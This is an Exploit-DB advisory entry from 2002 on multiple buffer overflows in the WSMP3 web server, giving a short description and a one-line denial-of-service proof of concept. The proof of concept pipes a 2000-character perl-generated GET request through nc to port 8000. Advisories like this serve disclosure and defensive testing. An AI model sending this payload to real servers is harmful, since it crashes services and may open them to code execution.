WSMP3 0.0.1/0.0.2 - Multiple Buffer Overflow Vulnerabilities

EDB-ID:

22033

CVE:

N/A


Type:

dos


Platform:

Linux

Date:

2002-11-25


source: https://www.securityfocus.com/bid/6239/info

Several buffer overflow conditions have been reported for WSMP3. The vulnerability is due to improper bounds checking when copying data to local buffers.

An attacker can exploit this vulnerability by sending an overly long request to the vulnerable server. This will trigger the buffer overflow condition, resulting in memory corruption. Ovewriting sensitive memory with malicious values may allow an attacker to execute arbitrary code on the target system.

(echo "GET `perl -e 'print \"x\"x2000'`";cat)|nc 0 8000